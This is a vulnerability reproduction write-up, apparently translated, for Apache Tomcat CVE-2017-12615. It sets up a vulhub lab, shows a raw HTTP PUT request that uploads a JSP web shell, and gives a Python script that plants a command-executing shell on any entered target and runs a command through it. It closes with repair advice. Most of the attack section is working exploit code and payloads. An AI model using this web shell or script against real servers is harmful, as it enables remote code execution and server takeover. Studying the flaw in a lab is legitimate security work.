1 Principle of vulnerability
- In the Apache Tomcat server, the PUT method is usually used to upload files. An attacker can upload malicious files to the server by sending a PUT request.
-
When the attacker sends a PUT request, the Tomcat server will write the data in the request to the specified file. If an attacker is able to control the file path, they can write a malicious file to any location, enabling arbitrary file writes.
2 Impact of the vulnerability
-
Arbitrary file writing: An attacker can write malicious files to any location on the server by constructing a malicious PUT request. This could result in the server being taken over by an attacker, or sensitive data being leaked.
-
Remote code execution: An attacker can upload a malicious script file (such as a JSP file) to the server and then execute malicious code by accessing the file. This may lead to remote code execution vulnerabilities, further threatening the security of the server.
-
Information leakage: Attackers can access sensitive information on the server, such as configuration files, log files, etc., by writing malicious files.
3 Environment setup
EntervulhubTable of contents
cd vulhub/tomcat/CVE-2017-12615
Deploy vulnerability environment
docker compose build
docker compose up -d
View port
docker compose ps
Visit and you will see a page indicating that the environment is running successfully.
4 Vulnerability Reproduction Steps
1 After capturing the packet, right-click Send to Repeater
2 Modify the request method to PUT, the file name is 1.jsp (any name), and the content is filled with shell script.
PUT /1.jsp/ HTTP/1.1
Host: 192.168.135.132:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=1CCD15499524302645C18183B820C173
Upgrade-Insecure-Requests: 1
Content-Length: 302
<%
java.io.InputStream is = Runtime.getRuntime()
.exec(request.getParameter("command"))
.getInputStream();
int a = -1;
byte\[\] b = new byte\[2048\];
while ((a = is.read(b)) != -1) {
out.print(new String(b));
}
%>
Here you see a 201 return, which means the upload should have been successful.
- Use a browser to access exc.jsp and execute any command
5. Write a python script to detect whether the vulnerability exists
#!/usr/bin/env python
import requests
import time
# hint:This code is for experimental and learning purposes only,Please use with caution。
print(" Notice:This code is for experimental and learning purposes only,Please use with caution")
# Define the malicious file name to be uploaded
payload\_file = 'shell1.jsp/'
def cve\_2017\_12615():
# Enter targetIPaddress and port
url = input("Please enter your goalIPaddress and port(Format:http://172.30.230.107:8080/):")
# Willpayload\_fileadd to targetURL
payload\_url = url + payload\_file
print(payload\_url)
# Define request headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0'
}
# Define malicious script content
payload\_body = ("<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\\"cmd\\")).getInputStream();"
"int a = -1;"
"byte\[\] b = new byte\[2048\];"
"while((a=in.read(b))!=-1){out.println(new String(b));}"
"%>")
# usePUTRequests a malicious script to be written to the server
response = requests.put(payload\_url, data=payload\_body, headers=headers)
print(payload\_url\[:-1\])
print(response.status\_code)
# wait for a while
time.sleep(3)
# Define test load
test\_payload = {
"cmd":"whoami"
}
# sendGETRequest to test whether the malicious script executes successfully
response2 = requests.get(payload\_url\[:-1\], headers=headers,params=test\_payload)
print(response2.status\_code)
if response2.status\_code == 200:
print("Vulnerability exists!!")
else:
print("The vulnerability does not exist!!")
# transfercve\_2017\_12615()function
cve\_2017\_12615()
result
6 Repair suggestions:
- Disable the PUT method: In the configuration file of the Apache Tomcat server (such as
web.xml
), disable the PUT method to prevent attackers from uploading files through PUT requests. -
Limit file upload paths: Limit the paths allowed to upload files in the application to prevent attackers from writing malicious files to sensitive locations.
-
Input verification and filtering: Strictly verify and filter user input to prevent malicious input from causing arbitrary file writing.
-
Use secure coding practices: Follow the secure coding practices provided by OWASP (Open Web Application Security Project) to ensure the security of your application.
。